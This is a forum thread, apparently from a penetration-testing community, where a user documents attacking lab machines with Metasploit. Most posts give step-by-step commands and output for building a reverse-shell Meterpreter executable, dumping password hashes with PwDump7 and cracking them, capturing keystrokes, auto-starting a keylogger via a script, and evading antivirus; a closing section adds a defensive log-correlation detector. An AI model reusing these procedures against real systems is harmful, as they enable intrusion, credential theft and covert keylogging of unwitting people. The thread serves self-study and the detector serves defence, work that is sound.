
Thread: Pentesting Documentation

  1. #1 AnActivist (Junior Member; Join Date: Apr 2009; Posts: 77)

    Pentesting Documentation

    I'm going to use this thread to document my progress using BT3 or any of the tools that are contained in BT3 but are being used with my Ubuntu distro. I'm going to try to post videos/detailed descriptions of any of the problems or successes that I have.

    The first step is deciding what OS I want my victim computer to run. I have an old Toshiba Satellite Pro 4200 series. It can run either XP SP2 or DSL (Damn Small Linux), or maybe I will try an older, more vulnerable version of Ubuntu. I'm thinking that I would like it to run XP SP2 just because it's a more popular OS, but from some of the reading I've done a lot of the exploits have been patched up.

    What option do you think will be the most beneficial/fun to use as the "victims" OS?

  2. #2 Archangel-Amael (Super Moderator; Join Date: Jan 2010; Location: Somewhere; Posts: 8,012)

    Quote Originally Posted by AnActivist:
    What option do you think will be the most beneficial/fun to use as the "victims" OS?
    Vmware with all of them at the same time.
    Make sure the host is secure though and up to date.
    Then you can start from there.
    Also if you can afford a couple more machines as time goes along you can setup different things on them as well.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3 Thorn (Senior Member; Join Date: Jan 2010; Location: The Green Dome; Posts: 1,509)

    Quote Originally Posted by AnActivist:
    I'm going to use this thread to document my progress using BT3 or any of the tools that are contained in BT3 but are being used with my Ubuntu distro. I'm going to try to post videos/detailed descriptions of any of the problems or successes that I have.

    The first step is deciding what OS I want my victim computer to run. I have an old Toshiba Satellite Pro 4200 series. It can run either XP SP2 or DSL (Damn Small Linux), or maybe I will try an older, more vulnerable version of Ubuntu. I'm thinking that I would like it to run XP SP2 just because it's a more popular OS, but from some of the reading I've done a lot of the exploits have been patched up.

    What option do you think will be the most beneficial/fun to use as the "victims" OS?
    I would suggest the De-ICE Live CD sets. They are well known, have some built-in vulnerabilities designed for pen testing and there is help on the Heorot.Net forums (the home of the De-ICE sets) if you get stuck.

    Damn Vulnerable Linux (DVL) is another option.
    Thorn
    Stop the TSA now! Boycott the airlines.

  4. #4 Archangel-Amael (Super Moderator; Join Date: Jan 2010; Location: Somewhere; Posts: 8,012)

    Quote Originally Posted by Thorn:
    I would suggest the De-ICE Live CD sets. They are well known, have some built-in vulnerabilities designed for pen testing and there is help on the Heorot.Net forums (the home of the De-ICE sets) if you get stuck.

    Damn Vulnerable Linux (DVL) is another option.
    De-ICE CDs are good learning tools indeed. But don't read the spoilers.

  5. #5 Thorn (Senior Member; Join Date: Jan 2010; Location: The Green Dome; Posts: 1,509)

    Quote Originally Posted by archangel.amael:
    De-ice cd's are good learning tools indeed. But don't read the spoilers.
    Well, only if you get really stuck.

  6. #6 AnActivist (Junior Member; Join Date: Apr 2009; Posts: 77)

    Thank you to everyone for all the feedback. I tried to get VMware up and running on my laptop but it's just too old with not enough memory. With VMware running my computer lags then crashes. As of right now I have a fresh install of Windows XP SP2 with no antivirus yet. This is my first documented experience. There are much more advanced ways to perform these tasks but being new I decided to try to simplify the process as much as possible. There are also a lot of tutorials on this but I don't think adding one more will hurt. Finally, this is really to help me learn, so if you see any errors please let me know so I can fix them.

    Goal: Use Metasploit to get into victims computer, get hashes, and crack them.
    Victim Specs: Windows XP SP2, no antivirus
    Attacker Specs: Ubuntu 8.10, Metasploit v3.2, John the Ripper
    Links/Tuts/Authors to be credited:
    John Strand Metasploit Meterpreter Reverse exe,
    pureh@te XP Passwords

    I had trouble finding an exploit for actually getting into the Windows box because it is SP2, so instead I made my payload into an .exe file that would be executed by the victim.

    The payload that I used was windows/meterpreter/reverse_tcp. This payload injects the meterpreter server DLL into the victim and then connects back to the attacker via the attacker's IP and port. To turn this into an executable you can use the following command:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.xxx LPORT=4444 X > MSPAYLOAD.exe
    If all goes well you should see something like this:
    Code:
    Created by msfpayload ().
    
    Payload: windows/meterpreter/reverse_tcp
    
     Length: 278
    
    Options: LHOST=192.168.1.xxx,LPORT=4444
    A couple of important notes:
    1. Make sure that you have navigated to the Metasploit Framework directory before issuing the above command, or instead of just issuing ./msfpayload issue something like /home/username/framework-3.2/msfpayload
    2. You can check your local IP by using the
    Code:
    ifconfig
    command. Be aware that the whole point of this is that the victim will be connecting to YOU, so you have to use YOUR IP.
    3. Take note of the LPORT; this is again the port the victim will be connecting to. You need to remember this so you can listen on it later.
    4. Don't forget the
    Code:
    X
    towards the end of the command; without it the payload won't be turned into an executable.

    Alright, so now we have our executable. This executable needs to be executed by the victim that we want to have connect back to us. You can use a lot of different creative ways to achieve this. A couple could be sending it via email, or using netcat or ssh. To simplify the process I just used a USB flash drive. All I did was copy MSPAYLOAD.exe to the flash drive and then from there copied it to the victim's computer. One important note is that when I tried this on a computer with Avast AV it freaked out; my victim box doesn't have an AV (antivirus) yet so it wasn't a problem, but if it is for you just disable the AV or try to figure out how to get past it (this is possible). Note: don't execute the executable yet.

    So now we have created our executable and it's on the victim's box. The next step is to start listening on the LPORT that we specified in our executable for the meterpreter that will be sent. We can do this using the exploit/multi/handler module. This module will allow us to wait for our payload/exploit/executable to be launched outside the framework. To do this first start up the msfconsole; you can do this with
    Code:
     ./msfconsole
    Once the console has started up, issue the following command:
    Code:
    use exploit/multi/handler
    If you were successful you should see the
    Code:
    msf >
    prompt change to
    Code:
     msf exploit(handler) >
    Now we need to set up our payload to listen for the meterpreter that will be sent from the victim's box once they execute the MSPAYLOAD.EXE. Issue the following command:
    Code:
     set PAYLOAD windows/meterpreter/reverse_tcp
    then set your LHOST and LPORT:
    Code:
    msf exploit(handler) > set LHOST 192.168.1.xxx
    
    LHOST => 192.168.1.100
    
    msf exploit(handler) > set LPORT 4444
    
    LPORT => 4444
    Once again make sure you note that this is your ip and that the port you are listening on must match the port that MSPAYLOAD.EXE will be sending the meterpreter to. Once you have checked that everything is in order issue the command
    Code:
    exploit
    If all goes well it should look like this:
    Code:
     msf exploit(handler) > exploit
    [*] Starting the payload handler...
    [*] Started reverse handler
    Now we are ready to execute MSPAYLOAD.EXE on the victim's box. Execute MSPAYLOAD.EXE (or whatever your .exe file is named) on the victim's box now. If you have done everything correctly so far then not much should happen on the victim's box, but on yours something magical has happened. Your msfconsole should now look like this:
    Code:
    msf exploit(handler) > exploit
    
    
    [*] Starting the payload handler...
    [*] Started reverse handler
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.1.xxx:4444 -> 192.168.1.103:1030)
    
    meterpreter >
    Note: If your meterpreter session doesn't open right away you can check for active sessions by typing “sessions -l” and then, using the particular ID of the active session, type “sessions -i (ID number)”.

    Now you are in. You can check the processes that are running on the victim's computer by issuing the
    Code:
     ps
    command and you should see MSPAYLOAD.EXE (or whatever you named your executable) nestled in there.

    Now we need to upload some files onto our victim's computer. The two files that we will be uploading are PwDump7.exe and libeay32.dll. We can do this by issuing the following commands:
    Code:
    upload /home/username/PwDump7/PwDump7.exe C:\\PwDump7.exe
    
    upload /home/username/PwDump7/libeay32.dll C:\\libeay32.dll
    If you are successful your msfconsole should look like this:
    Code:
    meterpreter > upload /home/max/PwDump7/PwDump7.exe C:\\PwDump7.exe
    [*] uploading  : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe
    [*] uploaded   : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe
    
    meterpreter > upload /home/max/PwDump7/libeay32.dll C:\\libeay32.dll
    [*] uploading  : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll
    [*] uploaded   : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll
    Some important notes:
    1. The directory that PwDump7.exe and libeay32.dll are located in may be different for you.
    2. You can download PwDump7 from

    Now that we have our important files uploaded onto the victim's computer we need to run PwDump7, but first we need to get a command prompt. To do this issue the following command:
    Code:
      execute -f cmd.exe -c -H -i
    If you are successful your msfconsole should have warped and now looks something like this:
    Code:
    meterpreter > execute -f cmd.exe -c -H -i
    
    Process 1644 created.
    
    Channel 3 created.
    
    Microsoft Windows XP [Version 5.1.2600]
    
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\>
    Now we want to execute PwDump7 and we want it to dump the hash into a text file that I will name XPHASH.txt. You can do this by issuing the following command:
    Code:
    PwDump7 > XPHASH.txt
    If you are successful your command prompt should look like this:
    Code:
    C:\>PwDump7 > XPHASH.txt
    
    PwDump7 > XPHASH.txt
    
    Pwdump v7.1 - raw password extractor
    
    Author: Andres Tarasco Acuna
    
    C:\>
    You can now exit the command prompt and get back into the meterpreter (this will happen automatically if you simply type “exit”). Once inside the meterpreter we want to download the newly created hash XPHASH.txt onto our computer so we can crack it with John the Ripper. You can download XPHASH.txt to your computer by issuing the following command:
    Code:
    download C:\\XPHASH.txt /home/username/Desktop/XPHASH.txt
    If you are successful your msfconsole should look like this:
    Code:
    meterpreter > download C:\\XPHASH.txt /home/max/Desktop/XPHASH.txt
    [*] downloading: C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt
    [*] downloaded : C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt
    Now you can exit and disconnect from the victim's box because we have everything we need. The final step is to use John the Ripper to crack XPHASH.txt.

    To crack XPHASH.txt you can issue the following command:
    Code:
    john -f:NT --wordlist=/home/username/Desktop/wordlist.txt /home/username/Desktop/XPHASH.txt
    Note:
    1. wordlist.txt can be downloaded for John the Ripper; just Google for JtR wordlist downloads.
    2. Your directories may be different than mine.
    3. If you want to do this only for testing purposes then you could just make a wordlist with the actual passwords of the box just to see if it works (this is what I did).

    That's it for me. I hope this helps some people. Like I said before, please point out errors so that I can fix them. I'm going to explore the password cracking process more and try to do this again. I'm also going to try to get past my AV, and explore new ways to get the .exe file onto the victim's computer.

    Last note: I wasn't able to post any URLs because I don't have enough posts; just Google if you want websites.

  7. #7 AnActivist (Junior Member; Join Date: Apr 2009; Posts: 77)

    Alright, well I didn't quite make the full leap to using BT3 as my main OS, but I did finally get the dual boot working. The whole experience was pretty intense and really showed me how I'm still clinging a little bit too tightly to MS and their pretty yet tacky GUIs. Just a tip for anyone reading: I think that it is easier to just erase the entire HDD, then install BT, and then install/partition with Ubuntu; no need to go completely into as many others have.

    The real interesting news is BigMac's video. I've used his method successfully (via his really well put together video) on my test box that is running XP SP2. I'm still going to work on double encoding and then try to see if I can get a keylogger working.

    Introduction:

    After following BigMac's tutorial I can get a meterpreter session on my test box (XP SP2) every time the computer restarts. I heard about the key logger functionality that the meterpreter has, so I did some reading about it. I read the following: **I can't post URLs but it's on the Metasploit blog** (just scroll down until you see the blog post about keysniffing). I wanted to test it out, so I started up the msfconsole, started waiting on my forwarded port, and then booted up my test box...

    Testing:

    Code:
    msf exploit(handler) > jobs
    
    Jobs
    ====
    
      Id  Name
      --  ----
      0   Exploit: multi/handler
    
    msf exploit(handler) >
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Killing Antivirus services on the target...
    [*] Meterpreter session 1 opened (xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx)
    
    sessions -l
    
    Active sessions
    ===============
    
      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx
    
    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter >
    If you go to the darkoperator blog that is linked in the above page there is this quote:
    Now when you use Meterpreter as a payload you will get in the stdapi the ability to start Keystroke Login by running a simple set of commands
    To me this means that the meterpreter session that I had just started would be sufficient enough to use the key logger. I typed in "help" to see if the commands were accessible...
    Code:
    Stdapi: User interface Commands
    ===============================
    
        Command        Description
        -------        -----------
        enumdesktops   List all accessible desktops and window stations
        idletime       Returns the number of seconds the remote user has been idle
        keyscan_dump   Dump they keystroke buffer
        keyscan_start  Start capturing keystrokes
        keyscan_stop   Stop capturing keystrokes
        setdesktop     Move to a different workstation and desktop
        uictl          Control some of the user interface components
    
    meterpreter >
    I was pretty disappointed to see that I didn't have the "grabdesktop" command that according to both blogs was needed for keyboard sniffing...

    I decided to try to move on without it and migrate to Explorer.exe...
    Note: 2004 is the PID of Explorer.exe
    Code:
    meterpreter > migrate 2004
    [*] Migrating to 2004...
    [*] Migration completed successfully.
    meterpreter >
    I then tried to start the keyscan with "keyscan_start". After that I opened up notepad on the test box and proceeded to pretend to log into a gmail account. (Note: The account and password are both fictional, also both the fictional password and email account were typed into notepad to simulate logging into gmail, this was done to prevent any infringement) After that I tried to dump the keys with "keyscan_dump"...
    Code:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    xxxgmail.xxx <Return> victimxgmail.xxx <Tab> t1sp4ssw0rdw0uldbeh4rdt0cr4ck <Return>
    meterpreter >
    Success! You can see that the victim's gmail account was victim@gmail.com and the password was t1sp4ssw0rdw0uldbeh4rdt0cr4ck.

    Note: After exiting the meterpreter session the test box got a Windows Explorer error and had to restart. I tried to get around this by migrating to a different process but this just causes a different error.

    But now let's try it without migrating. This time I did the exact same thing as before: listen on the forwarded port, start the meterpreter session, except now I did not migrate to Explorer.exe....
    Code:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    xxx.gmail.xxx <Return> victim2@gmail.xxx <Tab> thisisthesecondpassword <Return>
    meterpreter >
    Hmmm, success again? This time the gmail account is victim2@gmail.com and the password is thisisthesecondpassword.
    Note: There was no exiting error.

    Concluding Questions:

    After this test I'm left with 3 questions:
    1. Where are my missing Stdapi: User interface Commands?
    2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
    3. Why does the keylogger still obviously work (in this case) even though there are two missing parts: first using "grabdesktop" and second migrating to Explorer.exe?

    Hypotheses:

    1. Has something to do with the victim box being on my LAN.
    2. Has something to do with the victim's account having administrative access.
    3. The Metasploit team updated something.

    Looking forward to some feedback. Please feel free to test my method and show results.

  8. #8 AnActivist (Junior Member; Join Date: Apr 2009; Posts: 77)

    Follow up for using the key sniffing functionality with the meterpreter in Metasploit:

    My girlfriend, who runs Windows Vista, agreed to run a pentest with me. While I was at it I also tested out BigMac's method of making payload executables that are undetectable by AVs (she uses McAfee) and it was completely undetectable!

    Testing specs:
    Victim: Windows Vista with McAfee AV
    Attacker: BT3 Final
    Both computers have different IPs and are not on the same LAN

    Testing:
    After getting an active meterpreter session with the victim I proceeded to start sniffing for keystrokes with the "keyscan_start" command. It's important to note that I did not migrate processes or use the "grabdesktop" command. We then proceeded to do the same test as below, except on her computer. She opened a text file and typed "www.gmail.com" followed by a fictional email account and a fictional password. I then dumped the keystrokes with the "keyscan_dump" command and could see exactly what she had typed in plain text.

    Concluding Questions:

    Because everything went normally I am still left with the same three questions:
    1. Where are my missing Stdapi: User interface Commands?
    2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
    3. Why does the keylogger still obviously work (in this case) even though there are two missing parts: first using "grabdesktop" and second migrating to Explorer.exe?

    Hypothesis:

    What is exciting about this test is that I was able to eliminate two of my three hypotheses: first, it has nothing to do with the LAN (for obvious reasons); second, it doesn't have to do with administrative access (her account did not have administrative privileges); and a third that I hadn't asked: it doesn't have to do with XP, because she is running Vista.

    This leaves me with one last hypothesis:
    3. The Metasploit team updated something.
    Although it's strange, because I haven't read anything about it in their blog.

    Anyways, I think it was a very valuable test. I'll be searching for more information and will be updating. I'm not sure if this is interesting enough for a tutorial, especially since it's so simple, but I wouldn't mind helping out (as so many other people are posting videos and I haven't seen one about this) and making a video about it if people are interested.

    If anyone tries this and sees another reason why it's working for me and not for them, or has any other answers to the above questions, I'd really like to know.

    Cheers

    Automatically start sniffing keys:

    There is a script in the trunk/scripts/meterpreter directory called keylogrecorder.rb; the point of this script is to dump the keystrokes into a database. I'm trying to fully understand how this works, but from reading over the source code I was able to make my own script (probably the smallest one of all time) that will automatically execute the "keyscan_start" command. I then set the script to be run automatically also:
    Code:
    set AutoRunScript /root/Desktop/exploits/SCRIPTS/sniffKEYS.rb
    This makes it possible to automatically start sniffing for keystrokes as soon as the victim executes the payload that has been turned into an executable, in this case meta.exe.

    I'm still trying to learn about making more useful scripts. Especially trying to do things like move or delete files on the "victim's" box.

    This is what my sniffKEYS.rb script looks like; it's not much but it gets the job done.
    Code:
    # Meterpreter script launched via AutoRunScript: starts the keystroke sniffer when the session opens
    print_status("Starting the keystroke sniffer...")
    session.ui.keyscan_start
    Concluding Questions:

    1. Where is there more information about how to write scripts that automate meterpreter events?
    2. Where is there more information about how to write scripts that automate Windows events?

    I should have a follow-up post soon after doing some more research but if anyone already has the answers it would be much appreciated.

  9. #9 KMDave (Moderator; Join Date: Jan 2010; Posts: 2,281)

    First of all great that someone is learning on his own and sharing his results and thoughts.

    Something to think about: You mentioned that the keylogger gets executed every time the executable containing the payload is executed. But that would require it to be executed either manually by the victim or automatically. That is kind of noisy on a system. You could/should think of other ways too.
    Tiocfaidh ár lá

  10. #10 Developer (Join Date: Mar 2007; Posts: 6,126)

    Something else to think about that I have since learned is that using meterpreter's password hash function is much safer than pwdump because it was designed not to "touch the disk" like pwdump does.

    http://www.metasploit.com/data/antif...c_Analysis.pdf

    See slide 29
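A defender-side addition, written for this thread rather than taken from it or from Metasploit: the chain that posts #6 and #10 describe (an executable run from a user-writable path connecting out on a non-standard port, then spawning cmd.exe and writing PwDump7.exe and libeay32.dll into C:\) becomes visible in endpoint telemetry once events are correlated by process id. The events below are constructed in a Sysmon-like key=value shape; the field names, PIDs and paths are assumptions, not captured logs.

```python
"""Correlate process, file and network events to flag the post-exploitation
chain from this thread: a binary in a user-writable path connects out on a
non-standard port, then spawns cmd.exe and drops .exe/.dll files in C:\\.
Sample events are constructed (Sysmon-like key=value lines), not real logs."""
import re
from collections import defaultdict

SAMPLE_LOG = r"""
Event=NetworkConnect Pid=1588 Image=C:\Documents and Settings\victim\Desktop\MSPAYLOAD.EXE DestIp=192.168.1.100 DestPort=4444
Event=ProcessCreate Pid=1644 Image=C:\Windows\System32\cmd.exe ParentPid=1588 ParentImage=C:\Documents and Settings\victim\Desktop\MSPAYLOAD.EXE
Event=FileCreate Pid=1588 Image=C:\Documents and Settings\victim\Desktop\MSPAYLOAD.EXE TargetFilename=C:\PwDump7.exe
Event=FileCreate Pid=1588 Image=C:\Documents and Settings\victim\Desktop\MSPAYLOAD.EXE TargetFilename=C:\libeay32.dll
Event=ProcessCreate Pid=2100 Image=C:\Windows\System32\cmd.exe ParentPid=1200 ParentImage=C:\Windows\explorer.exe
Event=NetworkConnect Pid=900 Image=C:\Program Files\Mozilla Firefox\firefox.exe DestIp=93.184.216.34 DestPort=443
Event=FileCreate Pid=700 Image=C:\Windows\System32\msiexec.exe TargetFilename=C:\Program Files\App\app.exe
"""

# key=value pairs; values may contain spaces, so stop only before the next " Key="
KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
# An .exe or .dll written directly into a drive root, e.g. C:\PwDump7.exe
ROOT_EXE_RE = re.compile(r"^[A-Za-z]:\\[^\\]+\.(?:exe|dll)$", re.IGNORECASE)
# Binaries executing from user-writable locations (XP and Vista+ profile paths)
USER_PATH_RE = re.compile(r"\\(?:Users|Documents and Settings|Temp|AppData)\\", re.IGNORECASE)
# Ports where an outbound connection from a user-path binary is unremarkable
COMMON_PORTS = {80, 443, 53}


def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(KV_RE.findall(line))


def analyze(log_text):
    """Return (rule, pid, detail) findings, correlating by process id."""
    findings = []
    net_pids = {}  # pid -> destination port of an earlier outbound connection
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        kind = ev.get("Event")
        if kind == "NetworkConnect":
            port = int(ev["DestPort"])
            net_pids[ev["Pid"]] = port
            if USER_PATH_RE.search(ev["Image"]) and port not in COMMON_PORTS:
                findings.append(("user_path_outbound", ev["Pid"],
                                 f'{ev["Image"]} -> {ev["DestIp"]}:{port}'))
        elif kind == "ProcessCreate":
            # A shell spawned by a process that already holds a foreign connection
            # is the interactive "execute -f cmd.exe" step seen in the thread.
            if (ev["Image"].lower().endswith("\\cmd.exe")
                    and ev.get("ParentPid") in net_pids):
                findings.append(("cmd_from_network_proc", ev["Pid"],
                                 f'parent {ev["ParentImage"]} talks to port '
                                 f'{net_pids[ev["ParentPid"]]}'))
        elif kind == "FileCreate":
            # Tools uploaded to C:\ "touch the disk", which is what makes them visible here.
            if ROOT_EXE_RE.match(ev["TargetFilename"]):
                findings.append(("root_executable_drop", ev["Pid"],
                                 f'{ev["Image"]} wrote {ev["TargetFilename"]}'))
    return findings


def summarize(findings):
    """Count findings per rule."""
    counts = defaultdict(int)
    for rule, _, _ in findings:
        counts[rule] += 1
    return dict(counts)


if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_LOG):
        print(f"[{rule}] pid={pid} {detail}")
```

The explorer.exe-spawned cmd.exe, the browser's port 443 connection and the installer writing under Program Files are deliberately left unflagged so the rules show their false-positive boundary.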
